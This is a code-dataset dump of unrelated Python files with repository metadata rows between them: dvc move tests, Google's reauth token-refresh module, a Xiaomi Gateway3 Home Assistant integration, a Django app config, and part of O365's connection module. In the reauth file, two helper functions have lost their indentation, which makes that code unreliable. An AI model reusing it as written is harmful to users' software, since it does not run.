        self.assertTrue(os.path.exists(moved_data))
        self.assertTrue(os.path.exists(moved_stage))
def test_move_should_save_stage_info(tmp_dir, dvc):
    """After a move, the repo must still be clean (stage info preserved)."""
    tmp_dir.dvc_gen({"old_name": {"file1": "file1"}})

    dvc.move("old_name", "new_name")

    status = dvc.status()
    assert status == {}
def test_should_move_to_dir_on_non_default_stage_file(tmp_dir, dvc):
    """Moving into a directory works with a custom stage-file name."""
    custom_stage = "stage.dvc"
    tmp_dir.gen({"file": "file_content"})
    dvc.add("file", fname=custom_stage)
    os.mkdir("directory")

    dvc.move("file", "directory")

    assert os.path.exists(os.path.join("directory", "file"))
def test_move_gitignored(tmp_dir, scm, dvc):
    """Refuse to move a tracked file into a git-ignored directory."""
    from dvc.dvcfile import FileIsGitIgnored

    tmp_dir.dvc_gen({"foo": "foo"})
    os.mkdir("dir")
    (tmp_dir / "dir").gen(".gitignore", "*")

    with pytest.raises(FileIsGitIgnored):
        dvc.move("foo", "dir")

    # Nothing moved: source intact, destination untouched.
    assert (tmp_dir / "foo").read_text() == "foo"
    assert (tmp_dir / "foo.dvc").exists()
    assert not (tmp_dir / "dir" / "foo").exists()
    assert not (tmp_dir / "dir" / "foo.dvc").exists()
def test_move_output_overlap(tmp_dir, dvc):
    """Refuse a move whose destination overlaps another stage's output."""
    from dvc.exceptions import OverlappingOutputPathsError

    tmp_dir.dvc_gen({"foo": "foo", "dir": {"bar": "bar"}})

    with pytest.raises(OverlappingOutputPathsError):
        dvc.move("foo", "dir")

    # The failed move must leave everything in place.
    assert (tmp_dir / "foo").read_text() == "foo"
    assert (tmp_dir / "foo.dvc").exists()
    assert not (tmp_dir / "dir" / "foo").exists()
    assert not (tmp_dir / "dir" / "foo.dvc").exists()
def test_move_meta(tmp_dir, dvc):
    """Custom `meta` entries in the .dvc file must survive a move.

    Fix: removed a leftover debug `print(res)` that polluted test output.
    """
    (stage,) = tmp_dir.dvc_gen("foo", "foo")
    data = (tmp_dir / stage.path).parse()
    data["meta"] = {"custom_key": 42}
    (tmp_dir / stage.path).dump(data)

    dvc.move("foo", "bar")

    res = (tmp_dir / "bar.dvc").read_text()
    assert res == textwrap.dedent(
        """\
        outs:
        - md5: acbd18db4cc2f85cedef654fccc4a4d8
          size: 3
          path: bar
        meta:
          custom_key: 42
        """
    )
| 30.616236 | 79 | 0.646258 |
c23aca342113c333521003569b3ba0896a381926 | 11,131 | py | Python | platform/bq/third_party/google_reauth/reauth.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | platform/bq/third_party/google_reauth/reauth.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | platform/bq/third_party/google_reauth/reauth.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module that provides functions for handling rapt authentication.
Reauth is a process of obtaining additional authentication (such as password,
security token, etc.) while refreshing OAuth 2.0 credentials for a user.
Credentials that use the Reauth flow must have the reauth scope,
``https://www.googleapis.com/auth/accounts.reauth``.
This module provides a high-level function for executing the Reauth process,
:func:`refresh_access_token`, and lower-level helpers for doing the individual
steps of the reauth process.
Those steps are:
1. Obtaining a list of challenges from the reauth server.
2. Running through each challenge and sending the result back to the reauth
server.
3. Refreshing the access token using the returned rapt token.
"""
import json
import sys
from six.moves import http_client
from google_reauth import challenges
from google_reauth import errors
from google_reauth import _helpers
from google_reauth import _reauth_client
# OAuth scope required to talk to the reauth API.
_REAUTH_SCOPE = 'https://www.googleapis.com/auth/accounts.reauth'

# Token-endpoint error codes that signal a rapt (reauth proof token)
# refresh is needed (see _rapt_refresh_required below).
_REAUTH_NEEDED_ERROR = 'invalid_grant'
_REAUTH_NEEDED_ERROR_INVALID_RAPT = 'invalid_rapt'
_REAUTH_NEEDED_ERROR_RAPT_REQUIRED = 'rapt_required'

# Session status values returned by the reauth API.
_AUTHENTICATED = 'AUTHENTICATED'
_CHALLENGE_REQUIRED = 'CHALLENGE_REQUIRED'
_CHALLENGE_PENDING = 'CHALLENGE_PENDING'
def _run_next_challenge(msg, http_request, access_token):
    """Get the next challenge from msg and run it.

    Args:
        msg: Reauth API response body (either from the initial request to
            https://reauth.googleapis.com/v2/sessions:start or from sending
            the previous challenge response to
            https://reauth.googleapis.com/v2/sessions/id:continue)
        http_request: callable to run http requests. Accepts uri, method,
            body and headers. Returns a tuple: (response, content)
        access_token: reauth access token

    Returns: rapt token, or None if no challenge was ready or the user
        provided no challenge input.

    Raises:
        errors.ReauthError if reauth failed
    """
    for challenge in msg['challenges']:
        if challenge['status'] != 'READY':
            # Skip non-activated challenges.
            continue
        c = challenges.AVAILABLE_CHALLENGES.get(
            challenge['challengeType'], None)
        if not c:
            # Bug fix: the second placeholder was '{0}' so the message
            # repeated the challenge type instead of listing the
            # supported types; it must be '{1}'.
            raise errors.ReauthFailError(
                'Unsupported challenge type {0}. Supported types: {1}'
                .format(
                    challenge['challengeType'],
                    ','.join(challenges.AVAILABLE_CHALLENGES.keys())))
        if not c.is_locally_eligible:
            raise errors.ReauthFailError(
                'Challenge {0} is not locally eligible'
                .format(challenge['challengeType']))
        client_input = c.obtain_challenge_input(challenge)
        if not client_input:
            return None
        return _reauth_client.send_challenge_result(
            http_request,
            msg['sessionId'],
            challenge['challengeId'],
            client_input,
            access_token)
    return None
def _obtain_rapt(http_request, access_token, requested_scopes, rounds_num=5):
    """Given an http request method and reauth access token, get rapt token.

    Args:
        http_request: callable to run http requests. Accepts uri, method,
            body and headers. Returns a tuple: (response, content)
        access_token: reauth access token
        requested_scopes: scopes required by the client application
        rounds_num: max number of attempts to get a rapt after the next
            challenge, before failing the reauth. This defines total number
            of challenges + number of additional retries if the challenge
            input wasn't accepted.

    Returns: rapt token.

    Raises:
        errors.ReauthError if reauth failed
    """
    msg = None

    for _ in range(0, rounds_num):
        if not msg:
            # First round (or the previous challenge produced no
            # response): start a session and get the challenge list.
            msg = _reauth_client.get_challenges(
                http_request,
                list(challenges.AVAILABLE_CHALLENGES.keys()),
                access_token,
                requested_scopes)

        if msg['status'] == _AUTHENTICATED:
            return msg['encodedProofOfReauthToken']

        if not (msg['status'] == _CHALLENGE_REQUIRED or
                msg['status'] == _CHALLENGE_PENDING):
            raise errors.ReauthAPIError(
                'Challenge status {0}'.format(msg['status']))

        # Challenges need user interaction; bail out in unattended mode.
        if not _helpers.is_interactive():
            raise errors.ReauthUnattendedError()

        msg = _run_next_challenge(msg, http_request, access_token)

    # If we got here it means we didn't get authenticated.
    raise errors.ReauthFailError()
def get_rapt_token(http_request, client_id, client_secret, refresh_token,
                   token_uri, scopes=None):
    """Given an http request method and refresh_token, get rapt token.

    Obtains a reauth-scoped access token first, then drives the challenge
    flow to obtain the rapt (proof-of-reauth) token.

    Args:
        http_request: callable to run http requests. Accepts uri, method,
            body and headers. Returns a tuple: (response, content)
        client_id: client id to get access token for reauth scope.
        client_secret: client secret for the client_id
        refresh_token: refresh token to refresh access token
        token_uri: uri to refresh access token
        scopes: scopes required by the client application

    Returns: rapt token.

    Raises:
        errors.ReauthError if reauth failed
    """
    sys.stderr.write('Reauthentication required.\n')

    # Get access token for reauth.
    response, content = _reauth_client.refresh_grant(
        http_request=http_request,
        client_id=client_id,
        client_secret=client_secret,
        refresh_token=refresh_token,
        token_uri=token_uri,
        scopes=_REAUTH_SCOPE,
        headers={'Content-Type': 'application/x-www-form-urlencoded'})

    try:
        content = json.loads(content)
    except (TypeError, ValueError):
        raise errors.ReauthAccessTokenRefreshError(
            'Invalid response {0}'.format(_substr_for_error_message(content)))

    if response.status != http_client.OK:
        raise errors.ReauthAccessTokenRefreshError(
            _get_refresh_error_message(content), response.status)

    if 'access_token' not in content:
        raise errors.ReauthAccessTokenRefreshError(
            'Access token missing from the response')

    # Get rapt token from reauth API.
    rapt_token = _obtain_rapt(
        http_request,
        content['access_token'],
        requested_scopes=scopes)

    return rapt_token
def _rapt_refresh_required(content):
    """Checks if the rapt refresh is required.

    Args:
        content: refresh response content (raw JSON string)

    Returns:
        True if rapt refresh is required.
    """
    try:
        parsed = json.loads(content)
    except (TypeError, ValueError):
        return False
    if parsed.get('error') != _REAUTH_NEEDED_ERROR:
        return False
    subtype = parsed.get('error_subtype')
    return subtype in (_REAUTH_NEEDED_ERROR_INVALID_RAPT,
                       _REAUTH_NEEDED_ERROR_RAPT_REQUIRED)
def _get_refresh_error_message(content):
"""Constructs an error from the http response.
Args:
response: http response
content: parsed response content
Returns:
error message to show
"""
error_msg = 'Invalid response.'
if 'error' in content:
error_msg = content['error']
if 'error_description' in content:
error_msg += ': ' + content['error_description']
return error_msg
def _substr_for_error_message(content):
"""Returns content string to include in the error message"""
return content if len(content) <= 100 else content[0:97] + "..."
def refresh_access_token(
        http_request, client_id, client_secret, refresh_token,
        token_uri, rapt=None, scopes=None, headers=None):
    """Refresh the access_token using the refresh_token.

    If the token endpoint rejects the refresh because a rapt token is
    missing or invalid, a reauth flow is run once and the refresh is
    retried with the new rapt.

    Args:
        http_request: callable to run http requests. Accepts uri, method,
            body and headers. Returns a tuple: (response, content)
        client_id: client id to get access token for reauth scope.
        client_secret: client secret for the client_id
        refresh_token: refresh token to refresh access token
        token_uri: uri to refresh access token
        rapt: existing rapt token, if any
        scopes: scopes required by the client application
        headers: extra headers for the refresh request

    Returns:
        Tuple[str, str, str, Optional[str], Optional[str], Optional[str]]:
            The rapt token, the access token, new refresh token,
            expiration, token id and response content returned by the
            token endpoint.

    Raises:
        errors.ReauthError if reauth failed
        errors.HttpAccessTokenRefreshError it access token refresh failed
    """
    response, content = _reauth_client.refresh_grant(
        http_request=http_request,
        client_id=client_id,
        client_secret=client_secret,
        refresh_token=refresh_token,
        token_uri=token_uri,
        rapt=rapt,
        headers=headers)

    if response.status != http_client.OK:
        # Check if we need a rapt token or if the rapt token is invalid.
        # Once we refresh the rapt token, retry the access token refresh.
        # If we did refresh the rapt token and still got an error, then the
        # refresh token is expired or revoked.
        if (_rapt_refresh_required(content)):
            rapt = get_rapt_token(
                http_request,
                client_id,
                client_secret,
                refresh_token,
                token_uri,
                scopes=scopes,
            )
            # retry with refreshed rapt
            response, content = _reauth_client.refresh_grant(
                http_request=http_request,
                client_id=client_id,
                client_secret=client_secret,
                refresh_token=refresh_token,
                token_uri=token_uri,
                rapt=rapt,
                headers=headers)

    try:
        content = json.loads(content)
    except (TypeError, ValueError):
        raise errors.HttpAccessTokenRefreshError(
            'Invalid response {0}'.format(_substr_for_error_message(content)),
            response.status)

    if response.status != http_client.OK:
        raise errors.HttpAccessTokenRefreshError(
            _get_refresh_error_message(content), response.status)

    access_token = content['access_token']
    refresh_token = content.get('refresh_token', None)
    expires_in = content.get('expires_in', None)
    id_token = content.get('id_token', None)
    return rapt, content, access_token, refresh_token, expires_in, id_token
| 35.5623 | 79 | 0.670021 |
79043cf41aa29b5fb39b3b7e7cd4edd485a95348 | 8,812 | py | Python | custom_components/xiaomi_gateway3/__init__.py | avbor/HomeAssistantConf | 1f0fe16c8e3f3dcea7cc350f3fb9c233b6a22614 | [
"Unlicense"
] | 35 | 2021-02-25T06:30:42.000Z | 2022-03-09T20:18:47.000Z | custom_components/xiaomi_gateway3/__init__.py | avbor/HomeAssistantConf | 1f0fe16c8e3f3dcea7cc350f3fb9c233b6a22614 | [
"Unlicense"
] | 33 | 2021-11-22T16:30:43.000Z | 2022-03-29T18:00:13.000Z | custom_components/xiaomi_gateway3/__init__.py | avbor/HomeAssistantConf | 1f0fe16c8e3f3dcea7cc350f3fb9c233b6a22614 | [
"Unlicense"
] | 19 | 2021-02-20T05:29:58.000Z | 2022-02-05T16:22:30.000Z | import asyncio
import logging
import voluptuous as vol
from homeassistant.components.system_log import CONF_LOGGER
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import HomeAssistant, Event
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_create_clientsession
from homeassistant.helpers.entity_registry import EntityRegistry
from homeassistant.helpers.storage import Store
from .core import logger
from .core.gateway3 import Gateway3
from .core.helpers import DevicesRegistry
from .core.utils import DOMAIN, XiaomiGateway3Debug
from .core.xiaomi_cloud import MiCloud
_LOGGER = logging.getLogger(__name__)

# Entity platforms this integration forwards each config entry to.
DOMAINS = ['binary_sensor', 'climate', 'cover', 'light', 'remote', 'sensor',
           'switch', 'alarm_control_panel']

CONF_DEVICES = 'devices'
CONF_ATTRIBUTES_TEMPLATE = 'attributes_template'

# YAML config: optional per-device overrides (keyed by MAC/did string),
# logger settings, and a template for extra entity attributes.
CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Optional(CONF_DEVICES): {
            cv.string: vol.Schema({
                vol.Optional('occupancy_timeout'): cv.positive_int,
            }, extra=vol.ALLOW_EXTRA),
        },
        CONF_LOGGER: logger.CONFIG_SCHEMA,
        vol.Optional(CONF_ATTRIBUTES_TEMPLATE): cv.template
    }, extra=vol.ALLOW_EXTRA),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistant, hass_config: dict):
    """Set up the integration from YAML configuration (may be empty)."""
    config = hass_config.get(DOMAIN) or {}

    if CONF_LOGGER in config:
        logger.init(__name__, config[CONF_LOGGER], hass.config.config_dir)

        info = await hass.helpers.system_info.async_get_system_info()
        _LOGGER.debug(f"SysInfo: {info}")

        # update global debug_mode for all gateways
        if 'debug_mode' in config[CONF_LOGGER]:
            setattr(Gateway3, 'debug_mode', config[CONF_LOGGER]['debug_mode'])

    if CONF_DEVICES in config:
        for k, v in config[CONF_DEVICES].items():
            # AA:BB:CC:DD:EE:FF => aabbccddeeff
            k = k.replace(':', '').lower()
            DevicesRegistry.defaults[k] = v

    # Shared integration data; the attributes template is read later by
    # the entity platforms.
    hass.data[DOMAIN] = {
        CONF_ATTRIBUTES_TEMPLATE: config.get(CONF_ATTRIBUTES_TEMPLATE)
    }

    await _handle_device_remove(hass)

    # utils.migrate_unique_id(hass)
    return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
    """Set up a config entry.

    Supports two kinds of entries: a MiCloud account (identified by the
    presence of 'servers' in its data) and a Gateway.
    """
    # entry for MiCloud login
    if 'servers' in entry.data:
        return await _setup_micloud_entry(hass, entry)

    # migrate data (also after first setup) to options
    if entry.data:
        hass.config_entries.async_update_entry(entry, data={},
                                               options=entry.data)

    await _setup_logger(hass)

    # add options handler
    if not entry.update_listeners:
        entry.add_update_listener(async_update_options)

    hass.data[DOMAIN][entry.entry_id] = Gateway3(**entry.options)

    hass.async_create_task(_setup_domains(hass, entry))

    return True
async def async_update_options(hass: HomeAssistant, entry: ConfigEntry):
    """Reload the config entry when its options change."""
    await hass.config_entries.async_reload(entry.entry_id)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
    """Unload a gateway config entry and its entity platforms."""
    # check unload cloud integration
    if entry.entry_id not in hass.data[DOMAIN]:
        return

    # remove all stats entities if disable stats
    if not entry.options.get('stats'):
        suffix = ('_gateway', '_zigbee', '_ble')
        registry: EntityRegistry = hass.data['entity_registry']
        remove = [
            entity.entity_id
            for entity in list(registry.entities.values())
            if (entity.config_entry_id == entry.entry_id and
                entity.unique_id.endswith(suffix))
        ]
        for entity_id in remove:
            registry.async_remove(entity_id)

    gw: Gateway3 = hass.data[DOMAIN][entry.entry_id]
    await gw.stop()

    # Unload all forwarded entity platforms concurrently.
    await asyncio.gather(*[
        hass.config_entries.async_forward_entry_unload(entry, domain)
        for domain in DOMAINS
    ])

    return True
async def _setup_domains(hass: HomeAssistant, entry: ConfigEntry):
    """Forward the entry to all entity platforms, then start the gateway."""
    # init setup for each supported domains
    await asyncio.gather(*[
        hass.config_entries.async_forward_entry_setup(entry, domain)
        for domain in DOMAINS
    ])

    gw: Gateway3 = hass.data[DOMAIN][entry.entry_id]
    gw.start()

    # Stop the gateway thread cleanly on Home Assistant shutdown.
    entry.async_on_unload(
        hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, gw.stop)
    )
async def _setup_micloud_entry(hass: HomeAssistant, config_entry):
    """Log in to MiCloud and load/cache the account's device list.

    The device list is persisted under .storage so it survives cloud
    outages; returns False when no devices could be obtained at all.
    """
    data: dict = config_entry.data.copy()

    session = async_create_clientsession(hass)
    hass.data[DOMAIN]['cloud'] = cloud = MiCloud(session, data['servers'])

    if 'service_token' in data:
        # load devices with saved MiCloud auth
        cloud.auth = data
        devices = await cloud.get_devices()
    else:
        devices = None

    if devices is None:
        _LOGGER.debug(f"Login to MiCloud for {config_entry.title}")
        if await cloud.login(data['username'], data['password']):
            # update MiCloud auth in .storage
            data.update(cloud.auth)
            hass.config_entries.async_update_entry(config_entry, data=data)
            devices = await cloud.get_devices()
            if devices is None:
                _LOGGER.error("Can't load devices from MiCloud")
        else:
            _LOGGER.error("Can't login to MiCloud")

    # load devices from or save to .storage
    store = Store(hass, 1, f"{DOMAIN}/{data['username']}.json")
    if devices is None:
        _LOGGER.debug("Loading a list of devices from the .storage")
        devices = await store.async_load()
    else:
        _LOGGER.debug(f"Loaded from MiCloud {len(devices)} devices")
        await store.async_save(devices)

    if devices is None:
        _LOGGER.debug("No devices in .storage")
        return False

    # TODO: Think about a bunch of devices
    if 'devices' not in hass.data[DOMAIN]:
        hass.data[DOMAIN]['devices'] = devices
    else:
        hass.data[DOMAIN]['devices'] += devices

    for device in devices:
        # key - mac for BLE, and did for others
        did = device['did'] if device['pid'] not in '6' else \
            device['mac'].replace(':', '').lower()
        DevicesRegistry.defaults.setdefault(did, {})
        # don't override name if exists
        DevicesRegistry.defaults[did].setdefault('device_name', device['name'])

    return True
async def _handle_device_remove(hass: HomeAssistant):
    """Remove device from Hass and Mi Home if the device is renamed to
    `delete`.
    """

    async def device_registry_updated(event: Event):
        if event.data['action'] != 'update':
            return

        registry = hass.data['device_registry']
        hass_device = registry.async_get(event.data['device_id'])

        # check empty identifiers
        if not hass_device or not hass_device.identifiers:
            return

        # handle only our devices
        for hass_did in hass_device.identifiers:
            if hass_did[0] == DOMAIN and hass_device.name_by_user == 'delete':
                break
        else:
            return

        # remove from Mi Home
        for gw in hass.data[DOMAIN].values():
            if not isinstance(gw, Gateway3):
                continue
            gw_device = gw.get_device(hass_did[1])
            if not gw_device:
                continue
            if gw_device['type'] == 'zigbee':
                gw.debug(f"Remove device: {gw_device['did']}")
                await gw.miio.send('remove_device', [gw_device['did']])
            break

        # remove from Hass
        registry.async_remove_device(hass_device.id)

    hass.bus.async_listen('device_registry_updated', device_registry_updated)
async def _setup_logger(hass: HomeAssistant):
    """Enable web-visible debug logging if any config entry requests it.

    NOTE: 'defaul_level' (sic) is the attribute name used throughout this
    function; it caches the level set by Hass before we override it.
    """
    if not hasattr(_LOGGER, 'defaul_level'):
        # default level from Hass config
        _LOGGER.defaul_level = _LOGGER.level

    entries = hass.config_entries.async_entries(DOMAIN)
    web_logs = any(e.options.get('debug') for e in entries)

    # only if global logging don't set
    if _LOGGER.defaul_level == logging.NOTSET:
        # disable log to console
        _LOGGER.propagate = web_logs is False
        # set debug if any of integrations has debug
        _LOGGER.setLevel(logging.DEBUG if web_logs else logging.NOTSET)

    # if don't set handler yet
    if web_logs:
        # skip if already added
        if any(isinstance(h, XiaomiGateway3Debug) for h in _LOGGER.handlers):
            return
        handler = XiaomiGateway3Debug(hass)
        _LOGGER.addHandler(handler)

        if _LOGGER.defaul_level == logging.NOTSET:
            info = await hass.helpers.system_info.async_get_system_info()
            _LOGGER.debug(f"SysInfo: {info}")
| 32.758364 | 79 | 0.661825 |
c10d8f08218b22f201026b2ee8b086a98377fec6 | 95 | py | Python | src/vmc/webhook/thehive/apps.py | mSALDANHAf/vmc | 2475395a41284356a93ba7d523f4bcf2e5ef1ef7 | [
"Apache-2.0"
] | 37 | 2020-05-30T14:51:23.000Z | 2022-03-30T00:56:48.000Z | src/vmc/webhook/thehive/apps.py | mSALDANHAf/vmc | 2475395a41284356a93ba7d523f4bcf2e5ef1ef7 | [
"Apache-2.0"
] | 20 | 2019-12-05T01:06:43.000Z | 2022-02-16T17:37:52.000Z | src/vmc/webhook/thehive/apps.py | mSALDANHAf/vmc | 2475395a41284356a93ba7d523f4bcf2e5ef1ef7 | [
"Apache-2.0"
] | 10 | 2019-12-11T08:03:03.000Z | 2022-03-24T08:31:56.000Z | from django.apps import AppConfig
class TheHive(AppConfig):
    """Django application config for the TheHive webhook integration."""

    # Dotted path of the application this config belongs to.
    name = 'vmc.webhook.thehive'
| 15.833333 | 33 | 0.747368 |
78cc7c137897ea590468a36d429848ccb172ce78 | 33,554 | py | Python | O365/connection.py | jtweeder/python-o365 | b2863d95e13066cb544ff6c620f451e8eee11d8b | [
"Apache-2.0"
] | null | null | null | O365/connection.py | jtweeder/python-o365 | b2863d95e13066cb544ff6c620f451e8eee11d8b | [
"Apache-2.0"
] | null | null | null | O365/connection.py | jtweeder/python-o365 | b2863d95e13066cb544ff6c620f451e8eee11d8b | [
"Apache-2.0"
] | null | null | null | import json
import logging
import os
import time
import warnings
from pathlib import Path
from oauthlib.oauth2 import TokenExpiredError
from requests import Session
from requests.adapters import HTTPAdapter
from requests.exceptions import HTTPError, RequestException, ProxyError
from requests.exceptions import SSLError, Timeout, ConnectionError
# Dynamic loading of module Retry by requests.packages
# noinspection PyUnresolvedReferences
from requests.packages.urllib3.util.retry import Retry
from requests_oauthlib import OAuth2Session
from stringcase import pascalcase, camelcase, snakecase
from tzlocal import get_localzone
from .utils import ME_RESOURCE, BaseTokenBackend, FileSystemTokenBackend, Token
log = logging.getLogger(__name__)

O365_API_VERSION = 'v2.0'
GRAPH_API_VERSION = 'v1.0'
OAUTH_REDIRECT_URL = 'https://login.microsoftonline.com/common/oauth2/nativeclient'  # version <= 1.1.3. : 'https://outlook.office365.com/owa/'

# HTTP statuses that trigger an automatic retry.
RETRIES_STATUS_LIST = (
    429,  # Status code for TooManyRequests
    500, 502, 503, 504  # Server errors
)
RETRIES_BACKOFF_FACTOR = 0.5

# Scope helpers: each key expands to one or more raw OAuth scopes.
DEFAULT_SCOPES = {
    # wrap any scope in a 1 element tuple to avoid prefixing
    'basic': [('offline_access',), 'User.Read'],
    'mailbox': ['Mail.Read'],
    'mailbox_shared': ['Mail.Read.Shared'],
    'message_send': ['Mail.Send'],
    'message_send_shared': ['Mail.Send.Shared'],
    'message_all': ['Mail.ReadWrite', 'Mail.Send'],
    'message_all_shared': ['Mail.ReadWrite.Shared', 'Mail.Send.Shared'],
    'address_book': ['Contacts.Read'],
    'address_book_shared': ['Contacts.Read.Shared'],
    'address_book_all': ['Contacts.ReadWrite'],
    'address_book_all_shared': ['Contacts.ReadWrite.Shared'],
    'calendar': ['Calendars.ReadWrite'],
    'users': ['User.ReadBasic.All'],
    'onedrive': ['Files.ReadWrite.All'],
    'sharepoint_dl': ['Sites.ReadWrite.All'],
}
class Protocol:
    """ Base class for all protocols """

    # Override these in subclass
    _protocol_url = 'not_defined'  # Main url to request.
    _oauth_scope_prefix = ''  # Prefix for scopes
    _oauth_scopes = {}  # Dictionary of {scopes_name: [scope1, scope2]}

    def __init__(self, *, protocol_url=None, api_version=None,
                 default_resource=ME_RESOURCE,
                 casing_function=None, protocol_scope_prefix=None,
                 timezone=None, **kwargs):
        """ Create a new protocol object

        :param str protocol_url: the base url used to communicate with the
         server
        :param str api_version: the api version
        :param str default_resource: the default resource to use when there is
         nothing explicitly specified during the requests
        :param function casing_function: the casing transform function to be
         used on api keywords (camelcase / pascalcase)
        :param str protocol_scope_prefix: prefix url for scopes
        :param pytz.UTC timezone: preferred timezone, defaults to the
         system timezone
        :raises ValueError: if protocol_url or api_version are not supplied
        """
        if protocol_url is None or api_version is None:
            raise ValueError(
                'Must provide valid protocol_url and api_version values')
        self.protocol_url = protocol_url or self._protocol_url
        self.protocol_scope_prefix = protocol_scope_prefix or ''
        self.api_version = api_version
        self.service_url = '{}{}/'.format(protocol_url, api_version)
        self.default_resource = default_resource
        # When no casing function is given, keys pass through unchanged.
        self.use_default_casing = True if casing_function is None else False
        self.casing_function = casing_function or camelcase
        self.timezone = timezone or get_localzone()  # pytz timezone
        self.max_top_value = 500  # Max $top parameter value

        # define any keyword that can be different in this protocol
        # for example, attachments Odata type differs between Outlook
        # rest api and graph: (graph = #microsoft.graph.fileAttachment and
        # outlook = #Microsoft.OutlookServices.FileAttachment')
        self.keyword_data_store = {}

    def get_service_keyword(self, keyword):
        """ Returns the data set to the key in the internal data-key dict

        :param str keyword: key to get value for
        :return: value of the keyword
        """
        return self.keyword_data_store.get(keyword, None)

    def convert_case(self, key):
        """ Returns a key converted with this protocol casing method

        Converts case to send/read from the cloud

        When using Microsoft Graph API, the keywords of the API use
        lowerCamelCase Casing

        When using Office 365 API, the keywords of the API use PascalCase
        Casing

        Default case in this API is lowerCamelCase

        :param str key: a dictionary key to convert
        :return: key after case conversion
        :rtype: str
        """
        return key if self.use_default_casing else self.casing_function(key)

    @staticmethod
    def to_api_case(key):
        """ Converts key to snake_case

        :param str key: key to convert into snake_case
        :return: key after case conversion
        :rtype: str
        """
        return snakecase(key)

    def get_scopes_for(self, user_provided_scopes):
        """ Returns a list of scopes needed for each of the
        scope_helpers provided, by adding the prefix to them if required

        :param user_provided_scopes: a list of scopes or scope helpers
        :type user_provided_scopes: list or tuple or str
        :return: scopes with url prefix added
        :rtype: list
        :raises ValueError: if unexpected datatype of scopes are passed
        """
        if user_provided_scopes is None:
            # return all available scopes
            user_provided_scopes = [app_part for app_part in self._oauth_scopes]
        elif isinstance(user_provided_scopes, str):
            user_provided_scopes = [user_provided_scopes]

        if not isinstance(user_provided_scopes, (list, tuple)):
            raise ValueError(
                "'user_provided_scopes' must be a list or a tuple of strings")

        scopes = set()
        for app_part in user_provided_scopes:
            # Unknown helpers fall through as a literal (tuple-wrapped,
            # i.e. unprefixed) scope.
            for scope in self._oauth_scopes.get(app_part, [(app_part,)]):
                scopes.add(self._prefix_scope(scope))

        return list(scopes)

    def _prefix_scope(self, scope):
        """ Inserts the protocol scope prefix if required"""
        if self.protocol_scope_prefix:
            if isinstance(scope, tuple):
                # Tuple-wrapped scopes are used verbatim (never prefixed).
                return scope[0]
            elif scope.startswith(self.protocol_scope_prefix):
                return scope
            else:
                return '{}{}'.format(self.protocol_scope_prefix, scope)
        else:
            if isinstance(scope, tuple):
                return scope[0]
            else:
                return scope
class MSGraphProtocol(Protocol):
    """ A Microsoft Graph Protocol Implementation
    https://docs.microsoft.com/en-us/outlook/rest/compare-graph-outlook
    """

    _protocol_url = 'https://graph.microsoft.com/'
    _oauth_scope_prefix = 'https://graph.microsoft.com/'
    _oauth_scopes = DEFAULT_SCOPES

    def __init__(self, api_version='v1.0', default_resource=ME_RESOURCE,
                 **kwargs):
        """ Create a new Microsoft Graph protocol object

        :param str api_version: api version to use
        :param str default_resource: the default resource to use when there is
         nothing explicitly specified during the requests
        """
        super().__init__(protocol_url=self._protocol_url,
                         api_version=api_version,
                         default_resource=default_resource,
                         casing_function=camelcase,
                         protocol_scope_prefix=self._oauth_scope_prefix,
                         **kwargs)
        # Graph-specific odata type names used when (de)serializing objects.
        self.keyword_data_store.update({
            'message_type': 'microsoft.graph.message',
            'event_message_type': 'microsoft.graph.eventMessage',
            'file_attachment_type': '#microsoft.graph.fileAttachment',
            'item_attachment_type': '#microsoft.graph.itemAttachment',
        })
        self.max_top_value = 999  # Max $top parameter value
class MSOffice365Protocol(Protocol):
    """ A Microsoft Office 365 Protocol Implementation
    https://docs.microsoft.com/en-us/outlook/rest/compare-graph-outlook
    """

    _protocol_url = 'https://outlook.office.com/api/'
    _oauth_scope_prefix = 'https://outlook.office.com/'
    _oauth_scopes = DEFAULT_SCOPES

    def __init__(self, api_version='v2.0', default_resource=ME_RESOURCE,
                 **kwargs):
        """ Create a new Office 365 protocol object

        :param str api_version: api version to use
        :param str default_resource: the default resource to use when there is
         nothing explicitly specified during the requests
        """
        super().__init__(protocol_url=self._protocol_url,
                         api_version=api_version,
                         default_resource=default_resource,
                         casing_function=pascalcase,
                         protocol_scope_prefix=self._oauth_scope_prefix,
                         **kwargs)
        # Outlook-services type names used when (de)serializing objects.
        self.keyword_data_store.update({
            'message_type': 'Microsoft.OutlookServices.Message',
            'event_message_type': 'Microsoft.OutlookServices.EventMessage',
            'file_attachment_type': '#Microsoft.OutlookServices.FileAttachment',
            'item_attachment_type': '#Microsoft.OutlookServices.ItemAttachment',
        })
        self.max_top_value = 999  # Max $top parameter value
class Connection:
    """ Handles all communication (requests) between the app and the server """

    _allowed_methods = ['get', 'post', 'put', 'patch', 'delete']

    def __init__(self, credentials, *, scopes=None,
                 proxy_server=None, proxy_port=8080, proxy_username=None,
                 proxy_password=None, requests_delay=200, raise_http_errors=True,
                 request_retries=3, token_file_name=None, token_backend=None,
                 tenant_id='common', **kwargs):
        """ Creates an API connection object

        :param tuple credentials: a tuple of (client_id, client_secret)
         Generate client_id and client_secret in https://apps.dev.microsoft.com
        :param list[str] scopes: list of scopes to request access to
        :param str proxy_server: the proxy server
        :param int proxy_port: the proxy port, defaults to 8080
        :param str proxy_username: the proxy username
